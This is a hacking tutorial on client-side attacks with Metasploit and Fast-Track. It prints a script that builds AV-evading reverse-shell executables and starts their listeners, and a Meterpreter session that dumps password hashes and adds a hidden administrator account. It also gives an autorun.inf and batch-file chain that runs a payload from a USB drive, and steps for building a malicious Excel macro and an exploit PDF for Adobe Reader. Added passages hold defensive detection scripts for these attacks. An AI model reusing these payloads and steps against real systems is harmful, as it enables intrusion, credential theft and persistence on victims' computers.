Client-Side Attack With Metasploit (Part 4)
This is part four of the Grey Box Hacking tutorials. Before discussing the client-side attack, it is important to first comprehend what client-side means before an attack using Metasploit can be understood.
In short, the client side is the end of a client-server relationship where a user's software (the client) requests services from a server over the network.
A client-side attack takes advantage of the client-server relationship. The job of servers is to expose services to clients. With these services exposed, the clients can interact with them. A good example would be an instant messaging application.
Since the server exposes services, it also exposes any weaknesses in those services to the network. A client that interacts with them is exposed to the same weaknesses, and attackers use them to gain access to the network and to the clients’ computers.
It is called a client-side attack because the client has to initiate the interaction with the vulnerable service (open the file, visit the page, connect to the server) before the attack can take place. Savvy attackers use programs such as Metasploit to achieve this.
[0x04] – Client-Side Attack With Metasploit
“A typical example of a client-side attack is a malicious web page targeting a specific browser vulnerability that, if the attack is successful, would give the malicious server complete control of the client system.
“Client-side attacks are not limited to the web setting but can occur on any client/server pairs, for example, e-mail, FTP, instant messaging, multimedia streaming, etc.
“Client-side attacks currently represent an easy attack vector because most attention in protection technology has been focused on the protection of exposed servers from remote attackers.
“Clients are only protected in environments where access from internal clients to servers on the Internet is restricted via traditional defenses like firewalls or proxies. However, a firewall, unless combined with other technologies such as IPS, only restricts network traffic; once the traffic is permitted, a client interacting with a server is at risk. More advanced corporate server filtering solutions are available, but typically these only protect a limited set of client technologies.” –honeynet.org
[0x04a] – Metasploit Payload Generator
Metasploit Payload Generator is a tool that makes it easy to create malicious code. It is not a tool used to exploit a system: it creates the malicious payload and saves it as an executable (“exe”). The tricky part of the operation is finding a way to lure the target into downloading the payload onto their computer.
A feature is available to encode the payload so that it gets past most AV and IDS/IPS (13 encoding choices).
This is done by using the Metasploit Payload Generator from Fast-Track. The MetaCompiler shell script below performs the same steps by hand: it calls msfpayload to build the payload, pipes it through msfencode to produce an .exe, and then starts an msfcli multi/handler listener for the reverse connection.
#!/bin/bash
echo "###########################################"
echo "#### 0-Days Exploits with MetaCompiler ####"
echo "###########################################"
echo ""
echo -n "Enter your Listener IP Address: "
read ip
echo -n "Enter your Listener Port: "
read port
echo ""
echo "-= MetaCompiler Payloads =-"
echo ""
echo "+++++++++++++++++++++++++++++++++++++++++++++++++++++++++++++++++++++++"
echo "+ Meterpreter Reverse Connectback - windows/meterpreter/reverse_tcp +"
echo "+ VNC Inject Reverse Connectback  - windows/vncinject/reverse_tcp   +"
echo "+ Generic Reverse Shell           - generic/shell_reverse_tcp       +"
echo "+ Linux X86 Reverse Shell         - linux/x86/shell_reverse_tcp     +"
echo "+ Mac OSX (iphone) Reverse Shell  - osx/ppc/shell/reverse_tcp       +"
echo "+ Windows Reverse Shell           - windows/shell/reverse_tcp       +"
echo "+++++++++++++++++++++++++++++++++++++++++++++++++++++++++++++++++++++++"
echo ""
echo -n "Enter your Payload Exploit: "
read payload
echo -n "Enter your Output file name (xpl.exe): "
read file
echo ""
echo "-= Processing =-"
# Build the payload, encode it and write it out as a Windows executable
/pentest/exploits/framework3/msfpayload "$payload" LHOST="$ip" LPORT="$port" R | /pentest/exploits/framework3/msfencode -b '' -t exe -o "$file"
echo "Enjoy 0-Days Exploit with $file ;)"
echo ""
echo ""
echo "-= Now Waiting for Reverse Connection from Victim =-"
# Start the multi/handler listener for the payload that was just generated
/pentest/exploits/framework3/msfcli multi/handler PAYLOAD="$payload" LHOST="$ip" LPORT="$port" DisableCourtesyShell=True E
Below are the instructions for using Fast-Track.
bt fast-track # ./fast-track.py -i
***********************************************
******* Performing dependency checks... *******
***********************************************
*** FreeTDS and PYMMSQL are installed. (Check) ***
*** PExpect is installed. (Check) ***
*** ClientForm is installed. (Check) ***
*** Psyco is installed. (Check) ***
*** Beautiful Soup is installed. (Check) ***
*** PyMills is installed. (Check) ***
Also ensure ProFTP, WinEXE, and SQLite3 is installed from the Updates/Installation menu.
Your system has all requirements needed to run Fast-Track!

Fast-Track Main Menu:
Fast-Track - Where it's OK to finish in under 3 minutes...
Version: v4.0
Written by: David Kennedy (ReL1K)
http://www.securestate.com
http://www.thepentest.com

1. Fast-Track Updates
2. External Hacking
3. Internal Hacking
4. Exploits
5. SQLPwnage
6. Payload Generator
7. Tutorials
8. Changelog
9. Credits
10. About
11. Exit

Enter the number: 6
Configuration file not detected, running default path.
Recommend running setup.py install to configure Fast-Track.

#####################################
###                               ###
### Metasploit Payload Generator  ###
###                               ###
###     Written by: Dave Kennedy  ###
###            aka ReL1K          ###
###                               ###
#####################################

The Metasploit Payload Generator is a simple tool to make it extremely easy to generate a payload and listener on the Metasploit framework. This does not actually exploit any systems, it will generate a metasploit payload for you and save it to an executable. You then need to someone get it on the remote server by yourself and get it to execute correctly. This will also encode your payload to get past most AV and IDS/IPS.

What payload do you want to generate:

Name:                                       Description:
1. Windows Shell Reverse_TCP                Spawn a command shell on victim and send back to the attacker.
2. Windows Reverse_TCP Meterpreter          Spawn a Meterpreter shell on victim and send back to the attacker.
3. Windows Reverse_TCP VNC DLL              Spawn a VNC server on victim and send back to the attacker.
4. Windows Bind Shell                       Execute payload and create an accepting port on remote system.
5. Windows Reflective Reverse VNC           Spawn a VNC server on victim and send back to the attacker.
6. Windows Reflective Reverse Meterpreter   Spawn a Meterpreter shell on the victim through Reflective to the attacker.

Enter choice (example 1-6): 2

Below is a list of encodings for bypassing most AV.
Select one of the below, Avoid_UTF8_tolower usually gets past them.
1. avoid_utf8_tolower
2. shikata_ga_nai
3. alpha_mixed
4. alpha_upper
5. call4_dword_xor
6. countdown
7. fnstenv_mov
8. jmp_call_additive
9. nonalpha
10. nonupper
11. unicode_mixed
12. unicode_upper
13. alpha2
14. No Encoding

Enter your choice : 2
Enter IP Address of the listener/attacker (reverse) or host/victim (bind shell): 192.168.80.131
Enter the port of the Listener: 5555

Do you want to create an EXE or Shellcode
1. Executable
2. Shellcode

Enter your choice: 1
Created by msfpayload (http://www.metasploit.com).
Payload: windows/meterpreter/reverse_tcp
Length: 278
Options: LHOST=192.168.80.131,LPORT=5555,ENCODING=shikata_ga_nai

A payload has been created in this directory and is named 'payload.exe'. Enjoy!

Do you want to start a listener to receive the payload yes or no: yes
Launching Listener.
***********************************************************************************************
Launching MSFCLI on 'exploit/multi/handler' with PAYLOAD='windows/meterpreter/reverse_tcp'
Listening on IP: 192.168.80.131 on Local Port: 5555
Using encoding: ENCODING=shikata_ga_nai
***********************************************************************************************
[*] Handler binding to LHOST 0.0.0.0
[*] Started reverse handler
[*] Starting the payload handler...
[*] Transmitting intermediate stager for over-sized stage...(191 bytes)
[*] Sending stage (2650 bytes)
[*] Sleeping before handling stage...
[*] Uploading DLL (75787 bytes)...
[*] Upload completed.
[*] Meterpreter session 1 opened (192.168.80.131:5555 -> 192.168.80.1:13948)

meterpreter > getuid
Server username: LENOVO-X200\prathan
meterpreter > use priv
Loading extension priv...success.
meterpreter > hashdump
Administrator:500:F703F386322B0662E72C57EF50F76A05:C62638B38308E651B21A0F2CCAB3AC9B
Guest:501:A0E150C75A17008EAAD3B435B51404EE:823893ADFAD2CDA6E1A414F3EBDF58F7
prathan:1003:879980DE48006E7EAAD3B435B51404EE:BA69764BCCF8F41121E0B3046CE46C67
TsInternetUser:1002:52FE1A30EB33BA7BE3BB722E78963414:3A07E408DB9CB2331C9C527B0F4A8C52
meterpreter > execute -H -i -f cmd.exe
Process 692 created.
Channel 1 created.
Microsoft Windows XP [Version 5.1.2600]
(C) Copyright 1985-2001 Microsoft Corp.

C:\Documents and Settings\prathan\Desktop>hostname
LENOVO-X200

C:\Documents and Settings\prathan\Desktop>net user cwh 1234 /add
net user cwh 1234 /add
The command completed successfully.

C:\Documents and Settings\prathan\Desktop>net localgroup administrators cwh /add
net localgroup administrators cwh /add
The command completed successfully.

C:\Documents and Settings\prathan\Desktop>net user
net user

User accounts for

-------------------------------------------------------------------------------
Administrator            cwh                      Guest
prathan                  TsInternetUser
The command completed with one or more errors.
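The tail of that session (a new local user created with net user and then added to the Administrators group) leaves a reliable trace in the Windows Security log, whatever delivered the payload. The following detection is an added example, not part of the tutorial or of Fast-Track: it correlates account-creation and group-membership events per host and alerts when the two happen within a short window. The event IDs are real (4720/4732 on Vista and later, 624/636 on Windows XP and 2003, which is what the session above runs on); the event records themselves are constructed samples shaped like a SIEM's normalised fields.

```python
"""Correlate Windows Security audit events for the 'create user, add to
Administrators' sequence seen in the Meterpreter session above.

Added example, not part of the original tutorial or of Fast-Track. With
account-management auditing enabled, `net user cwh 1234 /add` logs event
4720 (account created) and `net localgroup administrators cwh /add` logs
4732 (member added to a security-enabled local group) on Vista and later;
Windows XP and 2003 use the older IDs 624 and 636. The events below are
constructed samples, not real log data.
"""
from datetime import datetime, timedelta

ACCOUNT_CREATED = {4720, 624}             # Vista+ ID, XP/2003 ID
LOCAL_GROUP_MEMBER_ADDED = {4732, 636}
PRIVILEGED_LOCAL_GROUPS = {"administrators", "remote desktop users", "backup operators"}

# Constructed sample events (not real log data).
SAMPLE_EVENTS = [
    {"time": "2009-05-10T14:02:11", "id": 528, "host": "LENOVO-X200",
     "target": "prathan", "group": None},                      # ordinary logon noise
    {"time": "2009-05-10T14:05:40", "id": 624, "host": "LENOVO-X200",
     "target": "cwh", "group": None},                          # net user cwh /add
    {"time": "2009-05-10T14:05:52", "id": 636, "host": "LENOVO-X200",
     "target": "cwh", "group": "Administrators"},              # net localgroup administrators cwh /add
    {"time": "2009-05-11T09:00:00", "id": 4720, "host": "FILESRV01",
     "target": "svc_backup", "group": None},                   # created by an admin...
    {"time": "2009-05-12T09:00:00", "id": 4732, "host": "FILESRV01",
     "target": "svc_backup", "group": "Administrators"},       # ...and elevated a day later
]


def _ts(event):
    return datetime.fromisoformat(event["time"])


def find_rapid_admin_creation(events, window=timedelta(minutes=10)):
    """Return one alert per account that was created and then added to a
    privileged local group on the same host within `window`."""
    created = {}   # (host, account) -> creation time
    alerts = []
    for ev in sorted(events, key=_ts):
        key = (ev["host"].lower(), ev["target"].lower())
        if ev["id"] in ACCOUNT_CREATED:
            created[key] = _ts(ev)
        elif (ev["id"] in LOCAL_GROUP_MEMBER_ADDED
              and (ev["group"] or "").lower() in PRIVILEGED_LOCAL_GROUPS):
            t0 = created.get(key)
            if t0 is not None and _ts(ev) - t0 <= window:
                alerts.append({
                    "host": ev["host"],
                    "account": ev["target"],
                    "group": ev["group"],
                    "seconds_between": int((_ts(ev) - t0).total_seconds()),
                })
    return alerts


if __name__ == "__main__":
    for a in find_rapid_admin_creation(SAMPLE_EVENTS):
        print(f"ALERT {a['host']}: new account '{a['account']}' added to "
              f"{a['group']} {a['seconds_between']}s after creation")
```

The ten-minute window is the tunable part: a helpdesk creating an account and elevating it the next day (the FILESRV01 pair in the sample) stays quiet, while the twelve-second gap produced by two back-to-back net commands fires. Process-creation auditing with command lines (4688, or 592 on XP) would catch the same activity, but the account-management events do not depend on it being enabled.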
As shown above, the victim is compromised through social engineering if they execute “payload.exe”. What happens if Autorun.inf is used to force the file to execute?
USB drive contents (file tree, followed by each file):

+autorun.inf
+icons\
+nircmd.exe
+batexe\
  -progstart.bat
  -moddump.bat
  -modsmax.bat

autorun.inf:
[autorun]
action=Open Files On Folder
icon=icons\drive.ico
shellexecute=nircmd.exe execmd CALL batexe\progstart.bat

batexe\progstart.bat:
@echo off
nircmd.exe execmd CALL batexe\moddump.bat
nircmd.exe execmd CALL batexe\modsmax.bat

batexe\moddump.bat:
@echo off
nircmd.exe execmd .\batexe\payload.exe

batexe\modsmax.bat:
@echo off
start nircmd.exe win max ititle "Remo"
If the victim opens the USB drive with AutoRun enabled, or double-clicks the drive in My Computer, the target system is compromised.
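The autorun.inf above is what a defender or forensic analyst would look at first on a suspect drive: a shellexecute= entry that chains into a batch file, plus an action= label and icon= that make the launcher look like Explorer's own "open folder" entry. The scanner below is an added example, not part of the tutorial; it parses the file with the standard library and reports those traits. Both sample files are constructed for the example.

```python
"""Inspect an autorun.inf from removable media and report whether it would
launch code when the drive is opened.

Added example, not part of the original tutorial. Standard library only; the
sample autorun.inf files are constructed, one mirroring the layout discussed
above and one a harmless vendor-style label/icon file.
"""
import configparser

# Constructed sample: the structure from the USB tree above.
SAMPLE_AUTORUN = """[autorun]
action=Open Files On Folder
icon=icons\\drive.ico
shellexecute=nircmd.exe execmd CALL batexe\\progstart.bat
"""

# Constructed benign sample: a drive label and icon, nothing executed.
BENIGN_AUTORUN = """[autorun]
label=Backup Drive
icon=backup.ico
"""

LAUNCH_KEYS = ("open", "shellexecute")
SCRIPT_HINTS = (".bat", ".cmd", ".vbs", ".js", "execmd", "cmd /c", "powershell")


def parse_autorun(text):
    """Return the [autorun] section as a dict with lower-cased keys."""
    cp = configparser.ConfigParser(interpolation=None, strict=False)
    cp.read_string(text)
    if not cp.has_section("autorun"):
        return {}
    return {k.lower(): v.strip() for k, v in cp.items("autorun")}


def assess_autorun(text):
    """Return human-readable findings; an empty list means the file only sets
    cosmetic properties (label, icon) and launches nothing."""
    entries = parse_autorun(text)
    findings = []
    launches = False
    for key in LAUNCH_KEYS:
        if key in entries:
            launches = True
            findings.append(f"{key}= launches: {entries[key]}")
            if any(h in entries[key].lower() for h in SCRIPT_HINTS):
                findings.append(f"{key}= goes through a script or command helper, "
                                "so the real payload lives elsewhere on the drive")
    # Cosmetic keys only matter once something is launched: together they
    # make the AutoPlay entry indistinguishable from Explorer's default one.
    if launches and "open" in entries.get("action", "").lower():
        findings.append("action= mimics Explorer's own 'Open folder to view files' entry")
    if launches and "icon" in entries:
        findings.append("icon= gives the launcher a normal-looking drive icon")
    return findings


def is_suspicious(text):
    return bool(assess_autorun(text))


if __name__ == "__main__":
    for name, sample in (("sample", SAMPLE_AUTORUN), ("benign", BENIGN_AUTORUN)):
        print(name, "->", assess_autorun(sample) or "nothing launched")
```

Any open= or shellexecute= entry is reported, including a vendor installer, because the point of the check is whether inserting the drive runs code at all. On the host side the same exposure is closed by disabling AutoRun for every drive type (the NoDriveTypeAutoRun value under HKLM\Software\Microsoft\Windows\CurrentVersion\Policies\Explorer set to 0xFF); Windows 7 and later no longer honour autorun.inf on USB storage, so the check is mainly for media triage and legacy hosts.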
[0x04b] – MS-Office Macro Ownage
MS Word, Excel, PowerPoint and similar programs can import Visual Basic scripts into their files. Metasploit can generate a Visual Basic script that contains a malicious payload.
In this example, we show a script for exploiting a victim with MS Excel. The victim machine starts a reverse VNC connection to the attacker’s machine after the victim opens the Excel file.
bt framework3 # ./msfpayload windows/vncinject/reverse_tcp LHOST=192.168.80.131 V > /tmp/script.bas
bt framework3 # ./msfcli multi/handler PAYLOAD=windows/vncinject/reverse_tcp LHOST=192.168.80.131 DisableCourtesyShell=True E
[*] Handler binding to LHOST 0.0.0.0
[*] Started reverse handler
[*] Starting the payload handler...
[*] Transmitting intermediate stager for over-sized stage...(191 bytes)
[*] Sending stage (2658 bytes)
[*] Sleeping before handling stage...
Now we have “script.bas”. Open MS Excel -> Tools -> Macro -> Visual Basic Editor, import “script.bas”, and save the Excel file.
After this is finished, the attacker uses human-to-human social engineering to manipulate the target into opening the Excel file and enabling macros. The attacker can then take control of the target’s computer.
[0x04c] – AdobeReader PDF Ownage
Metasploit has an exploit module for generating malicious PDF files that attack through “Adobe JBIG2Decode Memory Corruption.”
This module exploits a heap-based pointer corruption flaw in Adobe Reader 9.0.0 and earlier.
Once the malicious PDF is generated, it is sent to the victim(s); social engineering is used to get them to download it onto their computer.
bt framework3 # msfconsole
(msfconsole ASCII-art banner)

       =[ msf v3.3-dev
+ -- --=[ 288 exploits - 124 payloads
+ -- --=[ 17 encoders - 6 nops
       =[ 56 aux

msf > use windows/fileformat/adobe_jbig2decode
msf exploit(adobe_jbig2decode) > set TARGET 0
TARGET => 0
msf exploit(adobe_jbig2decode) > set FILENAME malfile.pdf
FILENAME => malfile.pdf
msf exploit(adobe_jbig2decode) > set PAYLOAD windows/meterpreter/reverse_tcp
PAYLOAD => windows/meterpreter/reverse_tcp
msf exploit(adobe_jbig2decode) > set LHOST 192.168.80.131
LHOST => 192.168.80.131
msf exploit(adobe_jbig2decode) > exploit
[*] Handler binding to LHOST 0.0.0.0
[*] Started reverse handler
[*] Creating 'malfile.pdf' file...
[*] Generated output file /pentest/exploits/framework3/data/exploits/malfile.pdf
[*] Exploit completed, but no session was created.
msf exploit(adobe_jbig2decode) > exit

bt framework3 # ./msfcli exploit/multi/handler PAYLOAD=windows/meterpreter/reverse_tcp LPORT=4444 LHOST=192.168.80.131 E
[*] Handler binding to LHOST 0.0.0.0
[*] Started reverse handler
[*] Starting the payload handler...
[*] Transmitting intermediate stager for over-sized stage...(191 bytes)
[*] Sending stage (2650 bytes)
[*] Sleeping before handling stage...
[*] Uploading DLL (75787 bytes)...
[*] Upload completed.
[*] Meterpreter session 1 opened (192.168.80.131:4444 -> 192.168.80.132:1041)

meterpreter > getuid
Server username: WINXP\victim
meterpreter > execute -H -i -f cmd.exe
Process 692 created.
Channel 1 created.
Microsoft Windows XP [Version 5.1.2600]
(C) Copyright 1985-2001 Microsoft Corp.

C:\Documents and Settings\victim\Desktop>
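Both document attacks on this page, the VBA module imported into Excel and the PDF built by the adobe_jbig2decode module, arrive as ordinary attachments, so mail gateways and incident responders triage them by content. The scanner below is an added example, not part of the tutorial or of Metasploit, and it serves both sections: one function scores an exported VBA module for the traits an msfpayload-style stub has (Win32 API declarations from kernel32, memory/thread calls, an auto-executing procedure, a long byte array), the other looks for the JBIG2Decode filter together with JavaScript or open-actions in a raw PDF, after undoing the #xx name escapes that are commonly used to hide those names. The indicator lists are heuristics written for the example, the sample inputs are constructed (the byte array is filler), and the PDF check does not inflate compressed object streams, so it can miss names hidden inside them.

```python
"""Triage the two attachment types used above: an exported VBA module of the
kind msfpayload's 'V' output produces, and a PDF carrying a JBIG2Decode
stream plus JavaScript.

Added example, not part of the original tutorial or of Metasploit. The
indicator lists are heuristics written for this example, the sample inputs
are constructed (the byte array is filler, not shellcode), and the PDF check
works on the raw file, so it will miss names inside compressed object streams.
"""
import re

# ---- VBA macro source --------------------------------------------------------
VBA_INDICATORS = {
    "auto-exec procedure": re.compile(
        r"\bSub\s+(Auto_?Open|Workbook_Open|Document_Open|AutoExec)\b", re.I),
    "Win32 API declaration": re.compile(
        r'\bDeclare\s+(PtrSafe\s+)?Function\s+\w+\s+Lib\s+"kernel32"', re.I),
    "memory/thread API": re.compile(
        r"\b(VirtualAlloc|RtlMoveMemory|CreateThread|WriteProcessMemory)\b", re.I),
    "external process launch": re.compile(
        r'\bShell\s*\(|CreateObject\s*\(\s*"WScript\.Shell"', re.I),
    "embedded byte array": re.compile(
        r"Array\s*\(\s*(&H[0-9A-F]{1,2}\s*,\s*){16,}", re.I),
}

# Constructed sample shaped like an exported .bas module; the array is filler.
SAMPLE_VBA = '''Attribute VB_Name = "Module1"
Private Declare Function CreateThread Lib "kernel32" (ByVal a As Long, ByVal b As Long, ByVal c As Long, ByVal d As Long, ByVal e As Long, ByRef f As Long) As Long
Private Declare Function VirtualAlloc Lib "kernel32" (ByVal a As Long, ByVal b As Long, ByVal c As Long, ByVal d As Long) As Long
Private Declare Function RtlMoveMemory Lib "kernel32" (ByVal a As Long, ByRef b As Any, ByVal c As Long) As Long

Sub Auto_Open()
    Dim buf As Variant
    buf = Array(''' + ", ".join(["&H90"] * 24) + ''')
    ' constructed filler; nothing in this sample is executed
End Sub

Sub Workbook_Open()
    Auto_Open
End Sub
'''

BENIGN_VBA = '''Sub BoldHeader()
    Range("A1:D1").Font.Bold = True
End Sub
'''


def scan_vba_source(text):
    """Return the names of indicators present in an exported VBA module."""
    return [name for name, rx in VBA_INDICATORS.items() if rx.search(text)]


# ---- PDF ---------------------------------------------------------------------
PDF_INDICATORS = {
    "JBIG2Decode filter": re.compile(rb"/JBIG2Decode\b"),
    "JavaScript": re.compile(rb"/(JavaScript|JS)\b"),
    "action on open": re.compile(rb"/(OpenAction|AA)\b"),
    "launch action": re.compile(rb"/Launch\b"),
}

# Constructed minimal PDF: an OpenAction pointing at JavaScript (with the
# name hex-escaped) and a one-pixel image using the JBIG2Decode filter.
SAMPLE_PDF = (
    b"%PDF-1.4\n"
    b"1 0 obj << /Type /Catalog /Pages 2 0 R /OpenAction 4 0 R >> endobj\n"
    b"2 0 obj << /Type /Pages /Kids [3 0 R] /Count 1 >> endobj\n"
    b"3 0 obj << /Type /Page /Parent 2 0 R /Resources << /XObject << /Im0 5 0 R >> >> >> endobj\n"
    b"4 0 obj << /S /J#61vaScript /JS (app.alert('constructed sample')) >> endobj\n"
    b"5 0 obj << /Type /XObject /Subtype /Image /Width 1 /Height 1 "
    b"/Filter /JBIG2Decode /Length 3 >> stream\n\x00\x00\x00\nendstream endobj\n"
    b"trailer << /Root 1 0 R >>\n%%EOF\n"
)


def normalise_pdf_names(data):
    """Undo #xx hex escapes in PDF names (e.g. /J#61vaScript -> /JavaScript)."""
    return re.sub(rb"#([0-9A-Fa-f]{2})",
                  lambda m: bytes([int(m.group(1), 16)]), data)


def scan_pdf(data):
    """Return the names of indicators present in a raw PDF byte string."""
    data = normalise_pdf_names(data)
    return [name for name, rx in PDF_INDICATORS.items() if rx.search(data)]


def pdf_needs_review(data):
    """JBIG2Decode on its own is normal for scanned documents; the filter
    combined with script or open-actions is what merits a closer look."""
    hits = set(scan_pdf(data))
    return "JBIG2Decode filter" in hits and bool(
        hits & {"JavaScript", "action on open", "launch action"})
```

For macros the useful signal is the combination: a kernel32 declaration plus an auto-executing procedure plus a long byte array is rare in legitimate workbooks, while any one of them alone is not. For PDFs the scanner deliberately does not treat JBIG2Decode as malicious by itself, because scanned documents use it routinely; pairing it with an OpenAction or JavaScript is what raises the file for review.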
Other techniques such as “DNS Spoofing + IE7” were great for mass exploitation; there is a video here that shows the technique.
This method uses Ettercap for DNS spoofing, then Metasploit to handle the reverse shell from the “IE7 MS09-002 Memory Corruption Vulnerability.” The spoofed DNS answers direct all machines on the same network to the attacker’s machine.